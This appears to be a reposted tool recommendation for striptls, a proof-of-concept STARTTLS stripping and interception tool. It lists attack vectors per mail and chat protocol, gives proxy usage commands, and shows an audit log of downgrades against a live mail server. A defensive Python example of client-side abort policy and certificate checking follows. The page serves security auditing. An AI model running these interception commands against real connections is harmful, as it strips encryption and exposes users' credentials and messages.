Tool recommendation: striptls, a POC implementation of STARTTLS stripping attacks

程序员文章站 2022-07-09 22:16:16
STARTTLS is an extension to plaintext communication protocols. It provides a way to upgrade a plaintext connection to an encrypted one (TLS or SSL) instead of using a separate port for encrypted communication.

striptls is a POC implementation of STARTTLS stripping attacks. The vectors it implements, grouped by protocol:

SMTP

SMTP.StripFromCapabilities - server response capability patch
SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
SMTP.StripWithTemporaryError
SMTP.StripWithError
SMTP.ProtocolDowngradeStripExtendedMode
SMTP.InjectCommand

POP3

POP3.StripFromCapabilities
POP3.StripWithError
POP3.UntrustedIntercept

IMAP

IMAP.StripFromCapabilities
IMAP.StripWithError
IMAP.UntrustedIntercept
IMAP.ProtocolDowngradeToV2

FTP

FTP.StripFromCapabilities
FTP.StripWithError
FTP.UntrustedIntercept

NNTP

NNTP.StripFromCapabilities
NNTP.StripWithError
NNTP.UntrustedIntercept

XMPP

XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept

ACAP (untested)

ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept

IRC

IRC.StripFromCapabilities
IRC.StripWithError
IRC.UntrustedIntercept
IRC.StripWithNotRegistered
IRC.StripCAPWithNotregistered
IRC.StripWithSilentDrop

Results:

[*] client: 127.0.0.1
    [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
    [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
    [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
    [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
[*] client: 192.168.139.1
    [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
    [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
    [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>
Usage:

#> python -m striptls --help    # from pip/setup.py
#> python striptls --help       # from source / root folder
Usage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25

Options:
  -h, --help            show this help message and exit
  -v, --verbose         make lots of noise [default]
  -l LISTEN, --listen=LISTEN
                        listen ip:port [default: 0.0.0.0:]
  -r REMOTE, --remote=REMOTE
                        remote target ip:port to forward sessions to
  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                        format assumed [default: server.pem]
  -x VECTORS, --vectors=VECTORS
                        Comma separated list of vectors. Use 'ALL' (default)
                        to select all vectors. Available vectors:
                        FTP.StripFromCapabilities, FTP.StripWithError,
                        FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                        IMAP.StripWithError, IMAP.UntrustedIntercept,
                        NNTP.StripFromCapabilities, NNTP.StripWithError,
                        NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                        POP3.StripWithError, POP3.UntrustedIntercept,
                        SMTP.ProtocolDowngradeStripExtendedMode,
                        SMTP.StripFromCapabilities, SMTP.StripWithError,
                        SMTP.StripWithInvalidResponseCode,
                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                        XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                        XMPP.UntrustedIntercept [default: ALL]
Installation:

1. Install from pip

#> pip install striptls

2. Install from source

#> setup.py install

Example:

                  inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target

Local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25

Audit mode:

Audit mode iterates over all test cases for the protocol in use and tracks clients that violate the STARTTLS protocol. You can press Ctrl+C at any time to abort the audit and print the results.

#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO     -  ready.
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): 
2016-02-02 22:11:56,276 - INFO     - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO     -  client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG    - 
2016-02-02 22:12:09,759 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG    -  [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING  -  terminated.
2016-02-02 22:12:13,056 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO     -  client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG    - 
2016-02-02 22:12:14,197 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG    -  [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING  -  terminated.
2016-02-02 22:12:16,649 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO     -  client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG    - 
2016-02-02 22:12:17,760 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING  -  terminated.
2016-02-02 22:12:20,071 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO     -  client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG    - 
2016-02-02 22:12:21,181 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG    -  [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING  -  terminated.
2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO     -  -- audit results --
2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [           ] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 

Besides audit mode, striptls can also strip STARTTLS from the server's capabilities, invalidate the STARTTLS response, perform an untrusted SSL intercept (which succeeds against clients that do not verify whether the server's certificate is trusted), and run a tracking audit for XMPP.
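
Seen from the client side, the SMTP vectors in the audit above reduce to a few decisions a mail client has to get right. The following Python example is added here and is not part of striptls: it replays the mangled server replies recorded in the audit log (the EHLO with STARTTLS removed, '200 STRIPTLS', '454 TLS not available due to temporary reason', '501 Syntax error') against the policy a non-vulnerable client must enforce, and shows the explicit ssl/smtplib settings that also defeat UntrustedIntercept. The '220 Go ahead' reply is a constructed sample value; the EHLO and error replies are taken from the log lines above.

```python
"""Client-side handling of the STARTTLS downgrade vectors listed on this page.

Added example (not part of striptls): replays the mangled server replies from
the audit log against the policy a non-vulnerable mail client has to enforce,
and shows the smtplib/ssl settings that close the same gaps.
"""
import re
import smtplib
import ssl

# Constructed sample replies, modelled on the '[client] <= [server]' lines in
# the audit log. The 'clean' 220 reply is constructed; the other STARTTLS
# replies are the mangled ones striptls injected.
EHLO_CLEAN = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
              "250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n")
EHLO_STRIPPED = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
                 "250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n")
STARTTLS_REPLIES = {
    "clean": "220 Go ahead\r\n",
    "StripWithInvalidResponseCode": "200 STRIPTLS\r\n",
    "StripWithTemporaryError": "454 TLS not available due to temporary reason\r\n",
    "StripWithError": "501 Syntax error\r\n",
}


def parse_ehlo(raw):
    """Return the extension keywords advertised in a multi-line 250 EHLO reply."""
    caps = set()
    for line in raw.split("\r\n")[1:]:       # line 0 is the server's greeting
        m = re.match(r"250[- ](\S+)", line)
        if m:
            caps.add(m.group(1).upper())
    return caps


def starttls_policy(ehlo_raw, starttls_reply):
    """Return 'upgrade' if the session may switch to TLS, otherwise 'abort'.

    starttls_reply is None when the client never sent STARTTLS because the
    capability was missing. Every deviation from a clean 220 is an abort:
    quietly continuing in plaintext is exactly what the audit reports as
    [Vulnerable!] for StripFromCapabilities, StripWithInvalidResponseCode,
    StripWithTemporaryError and StripWithError.
    """
    if "STARTTLS" not in parse_ehlo(ehlo_raw):
        return "abort"                       # StripFromCapabilities
    if starttls_reply is None:
        return "abort"
    code, sep = starttls_reply[:3], starttls_reply[3:4]
    if code != "220" or sep not in ("", " ", "-", "\r", "\n"):
        return "abort"                       # 200 / 454 / 501 all land here
    return "upgrade"


def replay_vectors():
    """Run the policy over every sample reply; mirrors the audit summary."""
    results = {"StripFromCapabilities": starttls_policy(EHLO_STRIPPED, None)}
    for name, reply in STARTTLS_REPLIES.items():
        results[name] = starttls_policy(EHLO_CLEAN, reply)
    return results


def hardened_context(cafile=None):
    """TLS context that fails the handshake on an untrusted certificate (the
    UntrustedIntercept vector). Pass it explicitly instead of relying on the
    library's default context."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def open_hardened_session(host, port, ctx=None):
    """Open an SMTP session that refuses every downgrade path above.
    Needs a network, so the self-check below does not exercise it."""
    ctx = ctx or hardened_context()
    smtp = smtplib.SMTP(host, port, timeout=10)
    smtp.ehlo()
    if not smtp.has_extn("starttls"):
        smtp.quit()
        raise RuntimeError("STARTTLS not advertised; refusing to continue in plaintext")
    # smtplib raises SMTPResponseException for any reply other than 220, and
    # the verifying context makes the handshake fail on a bad certificate.
    smtp.starttls(context=ctx)
    smtp.ehlo()                              # RFC 3207: re-EHLO after the upgrade
    return smtp


if __name__ == "__main__":
    for vector, verdict in replay_vectors().items():
        print(f"{vector:32s} -> {verdict}")
```

Running the block prints one verdict per vector; only the clean 220 reply yields "upgrade". The same rule applies to the IMAP, POP3, FTP, NNTP and XMPP variants listed above: a client that treats a missing capability or a non-success reply as "fall back to plaintext" is the one the audit marks as vulnerable.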

 
